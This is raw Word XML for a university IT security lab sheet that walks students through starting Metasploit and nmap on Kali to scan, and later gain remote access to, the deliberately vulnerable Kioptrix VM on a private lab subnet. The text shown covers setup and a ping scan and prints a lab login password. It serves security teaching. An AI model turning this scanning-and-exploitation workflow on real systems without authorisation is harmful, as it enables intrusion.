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BD8C" w14:textId="77777777" w:rsidR="00852683" w:rsidRDefault="00852683" w:rsidP="00852683">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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FBF69" wp14:editId="129F263E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4116350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>165710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2289175" cy="1127125"/>
                <wp:effectExtent l="8890" t="7620" r="6985" b="8255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175" cy="1127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44F688" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRPr="00477EF2" w:rsidRDefault="00477EF2" w:rsidP="00477EF2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477EF2">
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>You will need:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="51B29772" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRPr="00477EF2" w:rsidRDefault="00477EF2" w:rsidP="00477EF2">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:rPr>
                                <w:color w:val="0070C0"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00477EF2">
                              <w:rPr>
                                <w:color w:val="0070C0"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Kali (VM)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4B68DAA9" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRDefault="00477EF2" w:rsidP="00477EF2">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00477EF2">
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Windows XP (VM)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="109974F7" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRPr="00B37FBD" w:rsidRDefault="00477EF2" w:rsidP="00477EF2">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00B37FBD">
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Kioptrix</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00B37FBD">
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> level 1(VM)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6A28ECF6" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRPr="00477EF2" w:rsidRDefault="00477EF2" w:rsidP="00477EF2">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:rPr>
                                <w:color w:val="385623"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00477EF2">
                              <w:rPr>
                                <w:color w:val="385623"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>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3FBF69" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:324.1pt;margin-top:13.05pt;width:180.25pt;height:8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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5544F688" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRPr="00477EF2" w:rsidRDefault="00477EF2" w:rsidP="00477EF2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477EF2">
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>You will need:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="51B29772" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRPr="00477EF2" w:rsidRDefault="00477EF2" w:rsidP="00477EF2">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:color w:val="0070C0"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00477EF2">
                        <w:rPr>
                          <w:color w:val="0070C0"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Kali (VM)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4B68DAA9" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRDefault="00477EF2" w:rsidP="00477EF2">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00477EF2">
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Windows XP (VM)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="109974F7" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRPr="00B37FBD" w:rsidRDefault="00477EF2" w:rsidP="00477EF2">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00B37FBD">
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Kioptrix</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00B37FBD">
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> level 1(VM)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6A28ECF6" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRPr="00477EF2" w:rsidRDefault="00477EF2" w:rsidP="00477EF2">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:color w:val="385623"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00477EF2">
                        <w:rPr>
                          <w:color w:val="385623"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>access</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>COS30015 IT SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F71B7" w14:textId="77777777" w:rsidR="00852683" w:rsidRDefault="00852683" w:rsidP="00852683">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A663AD">
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A663AD">
        <w:t xml:space="preserve">week </w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DA2264" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00F53E86" w:rsidRDefault="00F53E86" w:rsidP="0085268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366636E9" w14:textId="77777777" w:rsidR="00852683" w:rsidRPr="003157E9" w:rsidRDefault="00852683" w:rsidP="00852683">
      <w:pPr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3157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>In this lab you will experiment with Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5567A8" w14:textId="77777777" w:rsidR="00852683" w:rsidRPr="003157E9" w:rsidRDefault="00852683" w:rsidP="003157E9">
      <w:pPr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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003157E9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is available on-line, but we will be using a modified </w:t>
      </w:r>
      <w:r w:rsidRPr="003157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">version which is on the Virtual Machine Launcher. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097657CD" w14:textId="77777777" w:rsidR="00852683" w:rsidRPr="003157E9" w:rsidRDefault="00852683" w:rsidP="003157E9">
      <w:pPr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1C12F6B1" w14:textId="77777777" w:rsidR="00852683" w:rsidRPr="003157E9" w:rsidRDefault="00852683" w:rsidP="003157E9">
      <w:pPr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3157E9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For this week we will be Metasploit to gain remote access to a vulnerable server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8EA604" w14:textId="77777777" w:rsidR="00852683" w:rsidRPr="003157E9" w:rsidRDefault="00852683" w:rsidP="003157E9">
      <w:pPr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3157E9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This will include some uses of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003157E9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and other interesting tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6183A664" w14:textId="77777777" w:rsidR="00C021FB" w:rsidRDefault="00C021FB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12933A59" w14:textId="77777777" w:rsidR="00BB5AFE" w:rsidRPr="00BB5AFE" w:rsidRDefault="00BB5AFE" w:rsidP="00BB5AFE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30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5AFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve">Part </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35323103" w14:textId="77777777" w:rsidR="00C021FB" w:rsidRPr="00F53E86" w:rsidRDefault="00C021FB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618F2145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1) Start </w:t>
      </w:r>
      <w:r w:rsidR="00AB450F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0059437A" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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level 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC4475" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="003157E9" w:rsidRDefault="0059437A" w:rsidP="00F53E86">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="002060"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="002060"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F53E86" w:rsidRPr="003157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="002060"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a hackable operating system that comes preconfigured out of the box. </w:t>
      </w:r>
      <w:r w:rsidR="00714A0A" w:rsidRPr="003157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="002060"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve">The version we are using is adapted to the Swinburne VMWare security labs. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADB2807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Today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Metasploit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Kioptrix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549B611E" w14:textId="77777777" w:rsidR="007F5945" w:rsidRDefault="007F5945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67E9AE29" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00F53E86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0ACB5B2D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2) start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B37FBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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and </w:t>
      </w:r>
      <w:r w:rsidR="0059437A" w:rsidRPr="00B37FBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w: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service</w:t>
      </w:r>
      <w:r w:rsidR="00477EF2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36757FA0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enable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need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start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 w:rsidRPr="001D0D0F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P</w:t>
      </w:r>
      <w:r w:rsidRPr="001D0D0F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ostgres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sql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daemon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etasplo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i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daemon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54ADF264" w14:textId="77777777" w:rsidR="007F5945" w:rsidRDefault="007F5945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First, log into Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3038DB4B" w14:textId="77777777" w:rsidR="007F5945" w:rsidRDefault="007F5945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1041947B" w14:textId="77777777" w:rsidR="007F5945" w:rsidRPr="00477EF2" w:rsidRDefault="00C74EA1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u</w:t>
      </w:r>
      <w:r w:rsidR="007F5945" w:rsidRPr="00477EF2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ser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE9EA0E" w14:textId="77777777" w:rsidR="007F5945" w:rsidRPr="00477EF2" w:rsidRDefault="007F594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477EF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>COS30015user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC4FDD8" w14:textId="77777777" w:rsidR="00B37FBD" w:rsidRDefault="00B37FBD" w:rsidP="00B37FB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ADF2D" wp14:editId="30A0CC91">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3290901</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>71805</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2124075" cy="71437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9D294" w14:textId="77777777" w:rsidR="00B37FBD" w:rsidRPr="00B37FBD" w:rsidRDefault="00B37FBD" w:rsidP="00B37FBD">
                            <w:pP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r w:rsidRPr="00B37FB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192.168.100.200</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A902BB2" w14:textId="77777777" w:rsidR="00B37FBD" w:rsidRPr="00B37FBD" w:rsidRDefault="00B37FBD" w:rsidP="00B37FBD">
                            <w:pP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r w:rsidRPr="00B37FB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192.168.100.0/24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ADF2D" id="Rectangle 5" o:spid="_x0000_s1027" style="position:absolute;margin-left:259.15pt;margin-top:5.65pt;width:167.25pt;height:56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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0679D294" w14:textId="77777777" w:rsidR="00B37FBD" w:rsidRPr="00B37FBD" w:rsidRDefault="00B37FBD" w:rsidP="00B37FBD">
                      <w:pPr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r w:rsidRPr="00B37FB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192.168.100.200</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0A902BB2" w14:textId="77777777" w:rsidR="00B37FBD" w:rsidRPr="00B37FBD" w:rsidRDefault="00B37FBD" w:rsidP="00B37FBD">
                      <w:pPr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r w:rsidRPr="00B37FB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192.168.100.0/24</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="564B0A61" w14:textId="77777777" w:rsidR="00B37FBD" w:rsidRPr="003157E9" w:rsidRDefault="00B37FBD" w:rsidP="00B37FBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="003157E9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 xml:space="preserve">What is the IP address for </w:t>
      </w:r>
      <w:r w:rsidR="003157E9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br/>
      </w:r>
      <w:r w:rsidRPr="003157E9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 xml:space="preserve">Kali? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA0CF3" w14:textId="77777777" w:rsidR="00B37FBD" w:rsidRPr="003157E9" w:rsidRDefault="00B37FBD" w:rsidP="00B37FBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="003157E9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>What is the sub-net?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232F745C" w14:textId="77777777" w:rsidR="007F5945" w:rsidRPr="00F53E86" w:rsidRDefault="007F5945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6E8FBC18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start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Kali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1D0D0F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service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utility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start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them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1B2FDA49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below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initiate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them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D5D5D9" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="007F5945" w:rsidRDefault="007F5945" w:rsidP="00F53E8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en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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lastRenderedPageBreak/>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ervice </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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start</w:t>
      </w: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C021FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>(You will be prompted for the user password: COS30015user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779A991" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="007F594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ervice </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B014F" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00276483" w:rsidRDefault="001D0D0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211E012D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3) load </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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from the command line on </w:t>
      </w:r>
      <w:r w:rsidR="0059437A" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w: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Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FEE25" w14:textId="77777777" w:rsidR="001D0D0F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Start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terminal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Kali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3EFFD044" w14:textId="77777777" w:rsidR="00C021FB" w:rsidRPr="007F5945" w:rsidRDefault="00C021FB" w:rsidP="00C021F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en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D0D0F" w:rsidRPr="001D0D0F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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 </w:t>
      </w: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br/>
      </w:r>
      <w:r w:rsidRPr="003157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve">(You </w:t>
      </w:r>
      <w:r w:rsidR="003157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>may</w:t>
      </w:r>
      <w:r w:rsidRPr="003157E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve"> be prompted for the user password: COS30015user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E59DD6" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="001D0D0F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61E5127A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probably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take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few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minutes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load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first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attempt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2C02B65A" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00F53E86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7F1A60F9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4) Check to make sure that the database is connected to </w:t>
      </w:r>
      <w:r w:rsidR="0059437A" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32073F32" w14:textId="77777777" w:rsidR="001D0D0F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5B103C0D" w14:textId="77777777" w:rsidR="00FF567C" w:rsidRPr="00FF567C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en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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db_status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check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connection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  <w:r w:rsidR="00FF567C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FF567C" w:rsidRPr="003157E9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 xml:space="preserve"> Response should </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FF567C" w:rsidRPr="003157E9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>be :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FF567C" w:rsidRPr="003157E9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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF567C" w:rsidRPr="003157E9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>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF567C" w:rsidRPr="003157E9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 xml:space="preserve"> connected to msf3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCA53A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hosts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gramStart"/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shows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hosts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have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been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found,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currently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are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none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63BB6820" w14:textId="77777777" w:rsidR="00746B47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services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hosts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have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found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about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them.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hosts,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nothing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available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27968D76" w14:textId="77777777" w:rsidR="00746B47" w:rsidRDefault="00746B47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55BDA8AE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5) </w:t>
      </w:r>
      <w:r w:rsidR="001D0D0F" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>R</w:t>
      </w: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un simple ping scan using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New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(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w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register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database)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67FCF99E" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="00FF567C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49D09" wp14:editId="2E992B40">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3505200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>295276</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2981325" cy="1066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BC1E6" w14:textId="77777777" w:rsidR="00FF567C" w:rsidRPr="00B37FBD" w:rsidRDefault="00FF567C" w:rsidP="00B37FBD">
                            <w:pP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r w:rsidRPr="00B37FB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192.168.1</w:t>
                            </w:r>
                            <w:r w:rsidR="00524118" w:rsidRPr="00B37FB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00</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B37FB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.134</w:t>
                            </w:r>
                            <w:r w:rsidR="00AB450F" w:rsidRPr="00B37FB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AB450F" w:rsidRPr="00B37FB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kiop</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00B37FB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br/>
                              <w:t>192.168.1</w:t>
                            </w:r>
                            <w:r w:rsidR="00524118" w:rsidRPr="00B37FB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00.???</w:t>
                            </w:r>
